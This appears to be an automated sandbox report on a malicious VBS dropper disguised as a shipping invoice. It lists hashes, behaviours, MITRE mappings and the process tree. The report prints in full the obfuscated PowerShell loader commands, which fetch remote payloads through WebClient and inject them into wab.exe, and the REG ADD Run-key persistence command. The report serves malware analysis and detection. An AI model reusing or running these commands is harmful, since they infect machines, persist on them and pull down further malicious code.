Analysis
-
max time kernel
146s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
20/08/2024, 11:42
Static task
static1
Behavioral task
behavioral1
Sample
BL_Awb_Shipping_Invoice_doc_001900720242247820020031808174CN20003190072024.vbs
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
BL_Awb_Shipping_Invoice_doc_001900720242247820020031808174CN20003190072024.vbs
Resource
win10v2004-20240802-en
General
-
Target
BL_Awb_Shipping_Invoice_doc_001900720242247820020031808174CN20003190072024.vbs
-
Size
140KB
-
MD5
58d33bad4955326610f6c2c6d5e06c12
-
SHA1
87984bcb2dc81a3bfcbdc8b21053547eaa4cb1ad
-
SHA256
d48c32bf817ba6547c83ce46e3d49e1ff8665275f5e4e8362b6303b46dd2e315
-
SHA512
8c7addc6600fd431cb952b517760e3ad71d6ef887b550d8ff22518de80cedfbc4872a5d93b5bd350b464a45de0e53450a6137a3992576688aad3788132ed367f
-
SSDEEP
3072:vjGO63YDSdYB51Gy/ABuIWHwxoH0sHXaHb0bIkNTEx29OjmUUe:rGO63WSdYB51Gy/quNHwaHdHqHb0bIkO
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2984 WScript.exe 9 1316 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Andengradsforbrndingerne = "%Buskins76% -w 1 $Bavaria=(Get-ItemProperty -Path 'HKCU:\\Infanterienheders\\').Lysbilledapparaterne;%Buskins76% ($Bavaria)" reg.exe -
pid Process 1316 powershell.exe 4824 powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4824 powershell.exe 4424 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4824 set thread context of 4424 4824 powershell.exe 99 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2984 WScript.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2496 reg.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1316 powershell.exe 1316 powershell.exe 4824 powershell.exe 4824 powershell.exe 4824 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4824 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1316 powershell.exe Token: SeDebugPrivilege 4824 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2984 wrote to memory of 1316 2984 WScript.exe 84 PID 2984 wrote to memory of 1316 2984 WScript.exe 84 PID 1316 wrote to memory of 1472 1316 powershell.exe 89 PID 1316 wrote to memory of 1472 1316 powershell.exe 89 PID 1316 wrote to memory of 4824 1316 powershell.exe 94 PID 1316 wrote to memory of 4824 1316 powershell.exe 94 PID 1316 wrote to memory of 4824 1316 powershell.exe 94 PID 4824 wrote to memory of 1452 4824 powershell.exe 96 PID 4824 wrote to memory of 1452 4824 powershell.exe 96 PID 4824 wrote to memory of 1452 4824 powershell.exe 96 PID 4824 wrote to memory of 4424 4824 powershell.exe 99 PID 4824 wrote to memory of 4424 4824 powershell.exe 99 PID 4824 wrote to memory of 4424 4824 powershell.exe 99 PID 4824 wrote to memory of 4424 4824 powershell.exe 99 PID 4824 wrote to memory of 4424 4824 powershell.exe 99 PID 4424 wrote to memory of 2344 4424 wab.exe 101 PID 4424 wrote to memory of 2344 4424 wab.exe 101 PID 4424 wrote to memory of 2344 4424 wab.exe 101 PID 2344 wrote to memory of 2496 2344 cmd.exe 103 PID 2344 wrote to memory of 2496 2344 cmd.exe 103 PID 2344 wrote to memory of 2496 2344 cmd.exe 103
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BL_Awb_Shipping_Invoice_doc_001900720242247820020031808174CN20003190072024.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentCulture) {$Udsyringer='SUBsTR';$Coadminister++;}$Udsyringer+='ing';Function imperceivableness($Yamaha){$Chromaphore41=$Yamaha.Length-$Coadminister;For( $medieforskere=2;$medieforskere -lt $Chromaphore41;$medieforskere+=3){$Agastreae+=$Yamaha.$Udsyringer.'Invoke'( $medieforskere, $Coadminister);}$Agastreae;}function Sopranos($Treague){ . ($sloganet) ($Treague);}$Monophthongal=imperceivableness ' .M ,oMez BiPal FlReaKo/ .5Ud. S0T Te(VaWF i,anradKooBlw ,sSu UnN TTu Af1Sa0.e.O.0.r;Ta .eW i DnSt6Re4St;Nj R.x 6 k4Et; C Klr .vMo: I1D.2Ri1No.Hu0E.)Ru A.GAfewicBlkFooGe/ P2Re0Po1Ef0 j0Bo1s,0 T1Sp AbF ai .rTee .f ,os xHe/Un1C,2 1G,.U,0Ko ';$Bash=imperceivableness 'DrUAcsPreBar a-DiA RgS,eStnSttVe ';$Dobbeltmntede24=imperceivableness ' rhTrtNotMopAfsAi:ud/ r/DesM e ori.vPar - .jKak ntSm. Ac oS mMa/,jA Kp CpSnaPorSpaFit Cs,m1Fo4Pa.TopPerInxSm>KahGetSct .p A: S/Un/ A1 B0P 3He.Fo7 A7E,.Re2C.4 p6 R.Ta1I,5 C/DeADapPrp,ra,orC.aCats.s r1,h4 T.Skp SrP.xSt>.ohPrtMotLepT,: V/Er/Uns.ao olD aEpr lc oiFjtkayUn. sr.oo.o/Cru .pS,dUdaSctAme B/MeASapMupKaaB r Da LtInsUt1 ,4 R.HypDlrAnx . ';$Modulating=imperceivableness ' A>pu ';$sloganet=imperceivableness ' aiope UxAn ';$Pentadecyl='Disembowel';$Ledighed180 = imperceivableness 'Ude,vc,xh.yoY. S%SaaDypM,pHadS a t TaAc%,e\NoUt n,odMeeFor Kv,niO.sAfnAriDonA,gFysSomRai LnP.i Us.dt UrTae ,nJ ef,s U.C,LH,ulag L ,o&St& y Te rcB hP o.i Ttt O ';Sopranos (imperceivableness '.w$ImgM,lDeoT.b MaFulRe:BoOArmR rS y MsA.t TnPriStnAfg HeB,r isPr0,u=Ha(N,cOvmSkdIs p/TacJu Tr$suLoge Dd SiSkgSthCle,edMu1Kr8 0 ) C ');Sopranos (imperceivableness 'f $ mgPal,ooinbPaaA.lb :A,N DeMdaMllNosA,o.anEr=In$a D.oo,tb lbp.eralSat LmA,n ,tmaeSmdPreKu2.y4Ho.etsc.pFll DiM tP.(T $BeMteoRedfruFrlFoaYatMai BnBrgU,)Ki ');Sopranos (imperceivableness 'T.[B,NFreR,tS,.asSl.e ArSivJaitrcNieS,PPuoudi,rnAntfuMGaaTan.iaWegSieFlr V] :Sw:PrS.ieH cP.uAprSkiGatTryP PChrHoo ,tenoUncU.oChl C a=Br ,u[FoNG erot F. LSP e,oc ku .rWoiAtt My uP,hr eo CtDeo Lc.oo,mlS TTay,rpPre.n]Gt:Af:SpT DlDasDo1In2 B ');$Dobbeltmntede24=$Nealson[0];$Doktordisputatsernes= (imperceivableness 'R,$ .gUnlC,oDybS.aevl n:ngTBar .oIspHehSkoK,bMul FaAns tP.=WoN NeRewIn-B.O Hb cj BeMuc MtPt d.SMiyDus,etUneDomDe.PoNLoe UtUn.phWOreTab ,CAllSti UeBan t');$Doktordisputatsernes+=$Omrystningers0[1];Sopranos ($Doktordisputatsernes);Sopranos (imperceivableness 'Na$E,T JrGao Bp.sh Fo KbmelA,aKrs OtAr.haH Ve.ia Sdu e Tr,osRe[Sl$,aB taBos ChKv]Ho= O$ HMAnoTonBeo.upLuh t HhEsoAknJeg .aSolwh ');$Predivinable=imperceivableness 'Ma$ .TNerDeoC.pHahSyo.fbKvlT aBesUdtLr.FrDSio Cw Mn .lUdophaAudC.FFliFul UeS.(Ma$ nDTaog.b.nbKoe al tS,mSvn St PeModTreAv2Ls4Cl,Su$foE Pm ea.rcT.iK aDitF,eKodEl)D, ';$Emaciated=$Omrystningers0[0];Sopranos (imperceivableness 'Sw$ gStlH,ohib bapel.o:H R RoAet.uaQut ni,uoBinE.s,s1 I7Wa2 s=Di( GTUne.ds,tt ,- .P a,itBehDe Bu$ExESum aP.cNaiC,a.ut.eeUndPo)tr ');while (!$Rotations172) {Sopranos (imperceivableness 'Sk$FugImlf.o UbBaaStlLu:E.T.uis dHad ,lsyyKow Si DnRhkStsRe= S$V,tNerobu ,eAf ') ;Sopranos $Predivinable;Sopranos (imperceivableness 'g.SGyt aFlrsktPl- PSJulSveBrePep u H,4Ra ');Sopranos (imperceivableness 'Po$EpgGul.poZeb.taRelTv:L,ROvoB,tHea.stPai SoVenSos ,1Fr7 s2Ga=An(S.TAfe.is.ktIk-GiP.ea ftf h O Pr$,yED.mFlaF.cFoiStaCyt AeCod )Di ') ;Sopranos (imperceivableness 'E.$F,g.eldaoPrbMua DlS.:HoRP eShpGytc iCol Re .sVo=.p$.igP l BoEqbPoaNelRa:.uPI raneOvmOpoC,n,cs,vtFlrBaaUnn UtAu+,l+ i% ,$ ANN.eAga .l,vsB,o hnO,. TcDeoBauR.n ot P ') ;$Dobbeltmntede24=$Nealson[$Reptiles];}$Airspace=372194;$Cremations=28214;Sopranos (imperceivableness ' e$.ng hlmeoRebSia,ilMe:UdA.nuJ.t .oSacExaFomAbp ciBunMagkj Ko=St GGGie rtMo- tCAsoMinRatTae ynpltFd ,m$EnEFamSeaC.cPriGoa .tAneM dNd ');Sopranos (imperceivableness 'Br$Grg,nlPsoAfb KaQulFo:BeC .oPrrkyrPlu PpvrtS eCadSa .r=Co Is[ SMeyAlsSet.oe RmSl.P.CJ,oDdn,tvBueSirLotGi]St:As:SaFD,rReo smRuBA.aShsAnen.6Ra4 HS gt.irH.iTon gGl(.a$GeAOruS.t aoIncSpaI mPhpRei bnS.g,v) D ');Sopranos (imperceivableness 'Al$U,gPtl,eoHab ,a kl o:byANon IoNodAdeUnrLe In=T, Te[D,SUdyPrs,utHyePeme,..oT.reHyx tn .UnE CnSicFoo ,d .iEtnS.g.p]Fl: :FnACuSIcCwiIovIDe.PiG PeLetBrSBetVor.di rnHeg o(,t$LyCChoCerCorChuH.pP t.oe d ,) e ');Sopranos (imperceivableness ',i$ AgE.lO,oDibKua .l.a:unBTjaSlvEnl oes.tDi2Ex1 d3,a=Sm$AnAM,n PoPedHye ,rIn.RasLiu bPhsSwtNorD.iVinTrgPh( i$,oA iP rBysC p aUncdie E,Pr$PrCT.rU e emsea ht TiTaoDunWasOr).o ');Sopranos $Bavlet213;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Undervisningsministrenes.Lug && echo t"3⤵PID:1472
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentCulture) {$Udsyringer='SUBsTR';$Coadminister++;}$Udsyringer+='ing';Function imperceivableness($Yamaha){$Chromaphore41=$Yamaha.Length-$Coadminister;For( $medieforskere=2;$medieforskere -lt $Chromaphore41;$medieforskere+=3){$Agastreae+=$Yamaha.$Udsyringer.'Invoke'( $medieforskere, $Coadminister);}$Agastreae;}function Sopranos($Treague){ . ($sloganet) ($Treague);}$Monophthongal=imperceivableness ' .M ,oMez BiPal FlReaKo/ .5Ud. S0T Te(VaWF i,anradKooBlw ,sSu UnN TTu Af1Sa0.e.O.0.r;Ta .eW i DnSt6Re4St;Nj R.x 6 k4Et; C Klr .vMo: I1D.2Ri1No.Hu0E.)Ru A.GAfewicBlkFooGe/ P2Re0Po1Ef0 j0Bo1s,0 T1Sp AbF ai .rTee .f ,os xHe/Un1C,2 1G,.U,0Ko ';$Bash=imperceivableness 'DrUAcsPreBar a-DiA RgS,eStnSttVe ';$Dobbeltmntede24=imperceivableness ' rhTrtNotMopAfsAi:ud/ r/DesM e ori.vPar - .jKak ntSm. Ac oS mMa/,jA Kp CpSnaPorSpaFit Cs,m1Fo4Pa.TopPerInxSm>KahGetSct .p A: S/Un/ A1 B0P 3He.Fo7 A7E,.Re2C.4 p6 R.Ta1I,5 C/DeADapPrp,ra,orC.aCats.s r1,h4 T.Skp SrP.xSt>.ohPrtMotLepT,: V/Er/Uns.ao olD aEpr lc oiFjtkayUn. sr.oo.o/Cru .pS,dUdaSctAme B/MeASapMupKaaB r Da LtInsUt1 ,4 R.HypDlrAnx . ';$Modulating=imperceivableness ' A>pu ';$sloganet=imperceivableness ' aiope UxAn ';$Pentadecyl='Disembowel';$Ledighed180 = imperceivableness 'Ude,vc,xh.yoY. S%SaaDypM,pHadS a t TaAc%,e\NoUt n,odMeeFor Kv,niO.sAfnAriDonA,gFysSomRai LnP.i Us.dt UrTae ,nJ ef,s U.C,LH,ulag L ,o&St& y Te rcB hP o.i Ttt O ';Sopranos (imperceivableness '.w$ImgM,lDeoT.b MaFulRe:BoOArmR rS y MsA.t TnPriStnAfg HeB,r isPr0,u=Ha(N,cOvmSkdIs p/TacJu Tr$suLoge Dd SiSkgSthCle,edMu1Kr8 0 ) C ');Sopranos (imperceivableness 'f $ mgPal,ooinbPaaA.lb :A,N DeMdaMllNosA,o.anEr=In$a D.oo,tb lbp.eralSat LmA,n ,tmaeSmdPreKu2.y4Ho.etsc.pFll DiM tP.(T $BeMteoRedfruFrlFoaYatMai BnBrgU,)Ki ');Sopranos (imperceivableness 'T.[B,NFreR,tS,.asSl.e ArSivJaitrcNieS,PPuoudi,rnAntfuMGaaTan.iaWegSieFlr V] :Sw:PrS.ieH cP.uAprSkiGatTryP PChrHoo ,tenoUncU.oChl C a=Br ,u[FoNG erot F. LSP e,oc ku .rWoiAtt My uP,hr eo CtDeo Lc.oo,mlS TTay,rpPre.n]Gt:Af:SpT DlDasDo1In2 B ');$Dobbeltmntede24=$Nealson[0];$Doktordisputatsernes= (imperceivableness 'R,$ .gUnlC,oDybS.aevl n:ngTBar .oIspHehSkoK,bMul FaAns tP.=WoN NeRewIn-B.O Hb cj BeMuc MtPt d.SMiyDus,etUneDomDe.PoNLoe UtUn.phWOreTab ,CAllSti UeBan t');$Doktordisputatsernes+=$Omrystningers0[1];Sopranos ($Doktordisputatsernes);Sopranos (imperceivableness 'Na$E,T JrGao Bp.sh Fo KbmelA,aKrs OtAr.haH Ve.ia Sdu e Tr,osRe[Sl$,aB taBos ChKv]Ho= O$ HMAnoTonBeo.upLuh t HhEsoAknJeg .aSolwh ');$Predivinable=imperceivableness 'Ma$ .TNerDeoC.pHahSyo.fbKvlT aBesUdtLr.FrDSio Cw Mn .lUdophaAudC.FFliFul UeS.(Ma$ nDTaog.b.nbKoe al tS,mSvn St PeModTreAv2Ls4Cl,Su$foE Pm ea.rcT.iK aDitF,eKodEl)D, ';$Emaciated=$Omrystningers0[0];Sopranos (imperceivableness 'Sw$ gStlH,ohib bapel.o:H R RoAet.uaQut ni,uoBinE.s,s1 I7Wa2 s=Di( GTUne.ds,tt ,- .P a,itBehDe Bu$ExESum aP.cNaiC,a.ut.eeUndPo)tr ');while (!$Rotations172) {Sopranos (imperceivableness 'Sk$FugImlf.o UbBaaStlLu:E.T.uis dHad ,lsyyKow Si DnRhkStsRe= S$V,tNerobu ,eAf ') ;Sopranos $Predivinable;Sopranos (imperceivableness 'g.SGyt aFlrsktPl- PSJulSveBrePep u H,4Ra ');Sopranos (imperceivableness 'Po$EpgGul.poZeb.taRelTv:L,ROvoB,tHea.stPai SoVenSos ,1Fr7 s2Ga=An(S.TAfe.is.ktIk-GiP.ea ftf h O Pr$,yED.mFlaF.cFoiStaCyt AeCod )Di ') ;Sopranos (imperceivableness 'E.$F,g.eldaoPrbMua DlS.:HoRP eShpGytc iCol Re .sVo=.p$.igP l BoEqbPoaNelRa:.uPI raneOvmOpoC,n,cs,vtFlrBaaUnn UtAu+,l+ i% ,$ ANN.eAga .l,vsB,o hnO,. TcDeoBauR.n ot P ') ;$Dobbeltmntede24=$Nealson[$Reptiles];}$Airspace=372194;$Cremations=28214;Sopranos (imperceivableness ' e$.ng hlmeoRebSia,ilMe:UdA.nuJ.t .oSacExaFomAbp ciBunMagkj Ko=St GGGie rtMo- tCAsoMinRatTae ynpltFd ,m$EnEFamSeaC.cPriGoa .tAneM dNd ');Sopranos (imperceivableness 'Br$Grg,nlPsoAfb KaQulFo:BeC .oPrrkyrPlu PpvrtS eCadSa .r=Co Is[ SMeyAlsSet.oe RmSl.P.CJ,oDdn,tvBueSirLotGi]St:As:SaFD,rReo smRuBA.aShsAnen.6Ra4 HS gt.irH.iTon gGl(.a$GeAOruS.t aoIncSpaI mPhpRei bnS.g,v) D ');Sopranos (imperceivableness 'Al$U,gPtl,eoHab ,a kl o:byANon IoNodAdeUnrLe In=T, Te[D,SUdyPrs,utHyePeme,..oT.reHyx tn .UnE CnSicFoo ,d .iEtnS.g.p]Fl: :FnACuSIcCwiIovIDe.PiG PeLetBrSBetVor.di rnHeg o(,t$LyCChoCerCorChuH.pP t.oe d ,) e ');Sopranos (imperceivableness ',i$ AgE.lO,oDibKua .l.a:unBTjaSlvEnl oes.tDi2Ex1 d3,a=Sm$AnAM,n PoPedHye ,rIn.RasLiu bPhsSwtNorD.iVinTrgPh( i$,oA iP rBysC p aUncdie E,Pr$PrCT.rU e emsea ht TiTaoDunWasOr).o ');Sopranos $Bavlet213;"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Undervisningsministrenes.Lug && echo t"4⤵
- System Location Discovery: System Language Discovery
PID:1452
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Andengradsforbrndingerne" /t REG_EXPAND_SZ /d "%Buskins76% -w 1 $Bavaria=(Get-ItemProperty -Path 'HKCU:\Infanterienheders\').Lysbilledapparaterne;%Buskins76% ($Bavaria)"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Andengradsforbrndingerne" /t REG_EXPAND_SZ /d "%Buskins76% -w 1 $Bavaria=(Get-ItemProperty -Path 'HKCU:\Infanterienheders\').Lysbilledapparaterne;%Buskins76% ($Bavaria)"6⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2496
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
521KB
MD560d8706557539d58f12ccd8bf955db39
SHA14f19074e5b756290e369ced634a8d0b30583f3ad
SHA2562bbd223fbef2a84a052d087e1659092a881aeeee9be17243e9c728152e7ebc15
SHA5122bc0b9e0c1abfa9ebd2d031cb674294b53faa962e434bb60741e7a56a4c8e7d852b2a131d4f8fa4f7e9e4cf8e778526bfdddf987748b8e114af1546f184b4cd7